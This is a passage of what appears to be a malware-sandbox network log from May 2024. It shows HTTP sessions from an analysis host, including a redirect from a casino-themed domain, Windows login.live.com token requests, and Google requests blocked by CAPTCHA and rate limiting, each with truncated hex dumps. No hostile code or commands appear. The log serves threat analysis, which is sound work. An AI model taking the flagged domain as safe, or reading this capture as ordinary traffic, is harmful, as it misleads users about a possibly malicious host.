                                                                                            Host: www.sol-casino-2023.club
                                                                                            Connection: close
                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                            Data Ascii:
                                                                                            May 3, 2024 13:22:16.744818926 CEST433INHTTP/1.1 302 Found
                                                                                            date: Fri, 03 May 2024 11:22:16 GMT
                                                                                            server: Apache
                                                                                            set-cookie: __tad=1714735336.4054456; expires=Mon, 01-May-2034 11:22:16 GMT; Max-Age=315360000
                                                                                            location: http://ww25.sol-casino-2023.club/ba94/?pratfT=iolsKzgpZ1NBt3juMfuMhkrDq6b7TDA/46a7L9Ma3wfGSQPZnAxkRO739civO1GZyrJ6&E6Ap=B2JhxD&subid1=20240503-2122-1602-a38c-346ebd7336a1
                                                                                            content-length: 2
                                                                                            content-type: text/html; charset=UTF-8
                                                                                            connection: close
                                                                                            Data Raw: 0a 0a
                                                                                            Data Ascii:


                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                            0192.168.2.44973820.190.151.9443
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-05-03 11:13:03 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                            Connection: Keep-Alive
                                                                                            Content-Type: application/soap+xml
                                                                                            Accept: */*
                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                            Content-Length: 4775
                                                                                            Host: login.live.com
                                                                                            2024-05-03 11:13:03 UTC4775OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                            Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                            2024-05-03 11:13:04 UTC569INHTTP/1.1 200 OK
                                                                                            Cache-Control: no-store, no-cache
                                                                                            Pragma: no-cache
                                                                                            Content-Type: application/soap+xml; charset=utf-8
                                                                                            Expires: Fri, 03 May 2024 11:12:03 GMT
                                                                                            P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                            Referrer-Policy: strict-origin-when-cross-origin
                                                                                            x-ms-route-info: C523_BL2
                                                                                            x-ms-request-id: 47f71840-173d-402b-9c9a-ce409447b14d
                                                                                            PPServer: PPV: 30 H: BL02EPF0001DA09 V: 0
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            X-XSS-Protection: 1; mode=block
                                                                                            Date: Fri, 03 May 2024 11:13:03 GMT
                                                                                            Connection: close
                                                                                            Content-Length: 11392
                                                                                            2024-05-03 11:13:04 UTC11392INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                            1192.168.2.44973920.190.151.9443
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-05-03 11:13:04 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                            Connection: Keep-Alive
                                                                                            Content-Type: application/soap+xml
                                                                                            Accept: */*
                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                            Content-Length: 4775
                                                                                            Host: login.live.com
                                                                                            2024-05-03 11:13:04 UTC4775OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                            Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                            2024-05-03 11:13:04 UTC569INHTTP/1.1 200 OK
                                                                                            Cache-Control: no-store, no-cache
                                                                                            Pragma: no-cache
                                                                                            Content-Type: application/soap+xml; charset=utf-8
                                                                                            Expires: Fri, 03 May 2024 11:12:04 GMT
                                                                                            P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                            Referrer-Policy: strict-origin-when-cross-origin
                                                                                            x-ms-route-info: C523_BL2
                                                                                            x-ms-request-id: 611c5566-be38-4440-adde-2e5f1b8c633e
                                                                                            PPServer: PPV: 30 H: BL02EPF0001D99C V: 0
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            X-XSS-Protection: 1; mode=block
                                                                                            Date: Fri, 03 May 2024 11:13:03 GMT
                                                                                            Connection: close
                                                                                            Content-Length: 11392
                                                                                            2024-05-03 11:13:04 UTC11392INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            2192.168.2.449744172.217.165.1324437352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-05-03 11:13:16 UTC607OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                            Host: www.google.com
                                                                                            Connection: keep-alive
                                                                                            X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                                                            Sec-Fetch-Site: none
                                                                                            Sec-Fetch-Mode: no-cors
                                                                                            Sec-Fetch-Dest: empty
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            2024-05-03 11:13:16 UTC1283INHTTP/1.1 200 OK
                                                                                            Date: Fri, 03 May 2024 11:13:16 GMT
                                                                                            Pragma: no-cache
                                                                                            Expires: -1
                                                                                            Cache-Control: no-cache, must-revalidate
                                                                                            Content-Type: text/javascript; charset=UTF-8
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-pCs0du4p41O-AXV_LLLeqQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                            Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                            Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                            Accept-CH: Sec-CH-Viewport-Width
                                                                                            Accept-CH: Sec-CH-Viewport-Height
                                                                                            Accept-CH: Sec-CH-DPR
                                                                                            Accept-CH: Sec-CH-UA-Platform
                                                                                            Accept-CH: Sec-CH-UA-Platform-Version
                                                                                            Accept-CH: Sec-CH-UA-Full-Version
                                                                                            Accept-CH: Sec-CH-UA-Arch
                                                                                            Accept-CH: Sec-CH-UA-Model
                                                                                            Accept-CH: Sec-CH-UA-Bitness
                                                                                            Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                            Accept-CH: Sec-CH-UA-WoW64
                                                                                            Permissions-Policy: unload=()
                                                                                            Content-Disposition: attachment; filename="f.txt"
                                                                                            Server: gws
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Accept-Ranges: none
                                                                                            Vary: Accept-Encoding
                                                                                            Connection: close
                                                                                            Transfer-Encoding: chunked
                                                                                            2024-05-03 11:13:16 UTC766INData Raw: 32 66 37 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 63 6f 69 6e 62 61 73 65 20 65 61 72 6e 69 6e 67 73 22 2c 22 66 6f 72 74 6e 69 74 65 20 75 70 64 61 74 65 20 73 74 61 72 20 77 61 72 73 22 2c 22 62 6f 73 74 6f 6e 20 62 72 75 69 6e 73 20 74 6f 72 6f 6e 74 6f 20 6d 61 70 6c 65 20 6c 65 61 66 73 22 2c 22 66 65 72 72 61 72 69 20 76 31 32 20 63 69 6c 69 6e 64 72 69 22 2c 22 6e 79 74 20 73 74 72 61 6e 64 73 20 68 69 6e 74 73 22 2c 22 72 75 65 32 31 20 73 74 6f 72 65 73 20 63 6c 6f 73 69 6e 67 22 2c 22 66 6c 6f 6f 64 69 6e 67 20 68 6f 75 73 74 6f 6e 20 74 65 78 61 73 22 2c 22 64 65 6e 76 65 72 20 62 72 6f 6e 63 6f 73 20 62 6a 20 77 65 73 74 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63
                                                                                            Data Ascii: 2f7)]}'["",["coinbase earnings","fortnite update star wars","boston bruins toronto maple leafs","ferrari v12 cilindri","nyt strands hints","rue21 stores closing","flooding houston texas","denver broncos bj west"],["","","","","","","",""],[],{"google:c
                                                                                            2024-05-03 11:13:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                            Data Ascii: 0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            3192.168.2.449745172.217.165.1324437352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-05-03 11:13:16 UTC510OUTGET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
                                                                                            Host: www.google.com
                                                                                            Connection: keep-alive
                                                                                            X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                                                            Sec-Fetch-Site: cross-site
                                                                                            Sec-Fetch-Mode: no-cors
                                                                                            Sec-Fetch-Dest: empty
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            2024-05-03 11:13:16 UTC1331INHTTP/1.1 302 Found
                                                                                            Location: https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgS_YOPbGMyN07EGIjACfJfOCNaD4TISjycM0JORvJFhG5ZwTBYCNVHc3-u05-7gGaBns57LrR4GTdhD_MIyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                                                                            x-hallmonitor-challenge: CgwIzI3TsQYQho_K9gISBL9g49s
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                            Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                            Permissions-Policy: unload=()
                                                                                            P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                            Date: Fri, 03 May 2024 11:13:16 GMT
                                                                                            Server: gws
                                                                                            Content-Length: 458
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            Set-Cookie: 1P_JAR=2024-05-03-11; expires=Sun, 02-Jun-2024 11:13:16 GMT; path=/; domain=.google.com; Secure; SameSite=none
                                                                                            Set-Cookie: NID=513=nJj-S8UBL5rusEPCKRTLlqPgaIU4uNvC17_1t0-Ydx42a1bdjTYSiuzvESpni9PvJPiQepp5rg-WTAJ_F4gbdYK1NhfKY851tDnH1YbxwN1YCCCs2bZYebUVXnKFbT9OyCVmnF0Qf-0NgbqO3isVsKwS4xukaXc-Wh1b3kgw4yU; expires=Sat, 02-Nov-2024 11:13:16 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close
                                                                                            2024-05-03 11:13:16 UTC458INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 6f 67 62 25 33 46 68
                                                                                            Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fh


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            4192.168.2.449746172.217.165.1324437352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-05-03 11:13:16 UTC353OUTGET /async/newtab_promos HTTP/1.1
                                                                                            Host: www.google.com
                                                                                            Connection: keep-alive
                                                                                            Sec-Fetch-Site: cross-site
                                                                                            Sec-Fetch-Mode: no-cors
                                                                                            Sec-Fetch-Dest: empty
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            2024-05-03 11:13:16 UTC1249INHTTP/1.1 302 Found
                                                                                            Location: https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YOPbGMyN07EGIjDQIIBqEDPxgJHCX_pnBgGTFIBXacAZ6kq7Pdgk5MPBVBYo5vIgBP84HnBhixFmN8IyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                                                                            x-hallmonitor-challenge: CgwIzI3TsQYQjs7BlgISBL9g49s
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                            Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                            Permissions-Policy: unload=()
                                                                                            P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                            Date: Fri, 03 May 2024 11:13:16 GMT
                                                                                            Server: gws
                                                                                            Content-Length: 417
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            Set-Cookie: 1P_JAR=2024-05-03-11; expires=Sun, 02-Jun-2024 11:13:16 GMT; path=/; domain=.google.com; Secure; SameSite=none
                                                                                            Set-Cookie: NID=513=WLnDOhd5dOsrExfTIhJzRGfaHO00URSXHC4egPqjg8LnTrCT9gCO6zVOSBMGLVXBjCpF9h7kR46c38yTIgUgly_c_22ExB0jC0lrxoxt0yZfs_uchdvsqNPZvpSBWIXNO1FhFBZGOykstV5zGJvfu28LzVU-qumcIzlOQgyoXsM; expires=Sat, 02-Nov-2024 11:13:16 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close
                                                                                            2024-05-03 11:13:16 UTC6INData Raw: 3c 48 54 4d 4c 3e
                                                                                            Data Ascii: <HTML>
                                                                                            2024-05-03 11:13:16 UTC411INData Raw: 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 70 72 6f 6d 6f 73 26 61 6d 70 3b 71 3d
                                                                                            Data Ascii: <HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&amp;q=


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            5192.168.2.449747172.217.165.1324437352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-05-03 11:13:17 UTC738OUTGET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YOPbGMyN07EGIjDQIIBqEDPxgJHCX_pnBgGTFIBXacAZ6kq7Pdgk5MPBVBYo5vIgBP84HnBhixFmN8IyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
                                                                                            Host: www.google.com
                                                                                            Connection: keep-alive
                                                                                            Sec-Fetch-Site: cross-site
                                                                                            Sec-Fetch-Mode: no-cors
                                                                                            Sec-Fetch-Dest: empty
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            Cookie: 1P_JAR=2024-05-03-11; NID=513=WLnDOhd5dOsrExfTIhJzRGfaHO00URSXHC4egPqjg8LnTrCT9gCO6zVOSBMGLVXBjCpF9h7kR46c38yTIgUgly_c_22ExB0jC0lrxoxt0yZfs_uchdvsqNPZvpSBWIXNO1FhFBZGOykstV5zGJvfu28LzVU-qumcIzlOQgyoXsM
                                                                                            2024-05-03 11:13:18 UTC356INHTTP/1.1 429 Too Many Requests
                                                                                            Date: Fri, 03 May 2024 11:13:18 GMT
                                                                                            Pragma: no-cache
                                                                                            Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                            Content-Type: text/html
                                                                                            Server: HTTP server (unknown)
                                                                                            Content-Length: 3113
                                                                                            X-XSS-Protection: 0
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close
                                                                                            2024-05-03 11:13:18 UTC899INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 70 72 6f 6d 6f 73 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64
                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>https://www.google.com/async/newtab_promos</title></head
                                                                                            2024-05-03 11:13:18 UTC1255INData Raw: 61 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 28 72 65 73 70 6f 6e 73 65 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 61 70 74 63 68 61 2d 66 6f 72 6d 27 29 2e 73 75 62 6d 69 74 28 29 3b 7d 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 64 69 76 20 69 64 3d 22 72 65 63 61 70 74 63 68 61 22 20 63 6c 61 73 73 3d 22 67 2d 72 65 63 61 70 74 63 68 61 22 20 64 61 74 61 2d 73 69 74 65 6b 65 79 3d 22 36 4c 66 77 75 79 55 54 41 41 41 41 41 4f 41 6d 6f 53 30 66 64 71 69 6a 43 32 50 62 62 64 48 34 6b 6a 71 36 32 59 31 62 22 20 64 61 74 61 2d 63 61 6c 6c 62 61 63 6b 3d 22 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 22 20 64 61 74 61 2d 73 3d 22 4f 33 75 36 70 4c 79 44 46 70 49 41 70 73 42 78 5f 45 4d 42 4d 70 6f 77 6a 70 5f 41 74 48 47 67 4d
                                                                                            Data Ascii: ack = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" data-sitekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" data-s="O3u6pLyDFpIApsBx_EMBMpowjp_AtHGgM
